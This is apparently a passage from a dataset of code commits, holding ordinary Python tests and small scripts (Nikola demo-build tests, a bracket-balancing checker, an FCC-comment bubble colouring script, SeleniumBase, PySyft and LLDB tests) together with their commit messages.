".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
Make the demo build available with pytest.
|
Make the demo build available with pytest.
This is useful on it's own and for porting further tests.
|
Python
|
mit
|
getnikola/nikola,getnikola/nikola,okin/nikola,getnikola/nikola,okin/nikola,okin/nikola,okin/nikola,getnikola/nikola
|
Make the demo build available with pytest.
This is useful on it's own and for porting further tests.
|
"""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
<commit_before><commit_msg>Make the demo build available with pytest.
This is useful on it's own and for porting further tests.<commit_after>
|
"""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
Make the demo build available with pytest.
This is useful on it's own and for porting further tests."""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
<commit_before><commit_msg>Make the demo build available with pytest.
This is useful on it's own and for porting further tests.<commit_after>"""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
|
559f89d49690fb74219c6de9c7f492cfa40ff9bb
|
TCCC2001Round2/Syntax.py
|
TCCC2001Round2/Syntax.py
|
openingParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
Check if brackets are balanced
|
Check if brackets are balanced
|
Python
|
mit
|
crisron/Topcoder,crisron/Topcoder,crisron/Topcoder
|
Check if brackets are balanced
|
openingParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
<commit_before><commit_msg>Check if brackets are balanced<commit_after>
|
openingParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
Check if brackets are balancedopeningParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
<commit_before><commit_msg>Check if brackets are balanced<commit_after>openingParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
|
7bce727470d3671f50e0c38fab1681eced89323a
|
cluster_viz/transform_pro_anti.py
|
cluster_viz/transform_pro_anti.py
|
import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
item['pro_anti']
print json.dumps(j, indent=4)
|
Add code for colorizing the pro/anti bubbles.
|
Add code for colorizing the pro/anti bubbles.
|
Python
|
mit
|
sunlightlabs/fcc-net-neutrality-comments,sunlightlabs/fcc-net-neutrality-comments,sunlightlabs/fcc-net-neutrality-comments,sunlightlabs/fcc-net-neutrality-comments
|
Add code for colorizing the pro/anti bubbles.
|
import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
item['pro_anti']
print json.dumps(j, indent=4)
|
<commit_before><commit_msg>Add code for colorizing the pro/anti bubbles.<commit_after>
|
import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
item['pro_anti']
print json.dumps(j, indent=4)
|
Add code for colorizing the pro/anti bubbles.import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
item['pro_anti']
print json.dumps(j, indent=4)
|
<commit_before><commit_msg>Add code for colorizing the pro/anti bubbles.<commit_after>import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
item['pro_anti']
print json.dumps(j, indent=4)
|
|
8f79049d204235d7571ca2a83ffdc81db402db25
|
examples/image_test.py
|
examples/image_test.py
|
"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
Add image test to save an element screenshot to a file
|
Add image test to save an element screenshot to a file
|
Python
|
mit
|
seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase
|
Add image test to save an element screenshot to a file
|
"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
<commit_before><commit_msg>Add image test to save an element screenshot to a file<commit_after>
|
"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
Add image test to save an element screenshot to a file"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
<commit_before><commit_msg>Add image test to save an element screenshot to a file<commit_after>"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
|
8d9da9022a7cf16b746fd6d0b9a83723fc78bff8
|
apps/domain/tests/test_routes/test_setup.py
|
apps/domain/tests/test_routes/test_setup.py
|
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
ADD Domain setup unit tests
|
ADD Domain setup unit tests
|
Python
|
apache-2.0
|
OpenMined/PySyft,OpenMined/PySyft,OpenMined/PySyft,OpenMined/PySyft
|
ADD Domain setup unit tests
|
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
<commit_before><commit_msg>ADD Domain setup unit tests<commit_after>
|
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
ADD Domain setup unit tests
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
<commit_before><commit_msg>ADD Domain setup unit tests<commit_after>
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
|
5d896ff27b2bd3f8c8c6b6af58b2b9aa3f1a6695
|
packages/Python/lldbsuite/test/commands/expression/invalid-args/TestInvalidArgsExpression.py
|
packages/Python/lldbsuite/test/commands/expression/invalid-args/TestInvalidArgsExpression.py
|
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
Add test for invalid expression command args
|
[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8
|
Python
|
apache-2.0
|
apple/swift-lldb,apple/swift-lldb,llvm-mirror/lldb,apple/swift-lldb,apple/swift-lldb,apple/swift-lldb,apple/swift-lldb,llvm-mirror/lldb,llvm-mirror/lldb,llvm-mirror/lldb,llvm-mirror/lldb
|
[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8
|
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
<commit_before><commit_msg>[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8<commit_after>
|
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
<commit_before><commit_msg>[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8<commit_after>import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
|
4c39c3785499bd9973007bd6ad9044a28accd063
|
djangae/tests/test_mail.py
|
djangae/tests/test_mail.py
|
# THIRD PARTY
from django.core.mail import send_mail
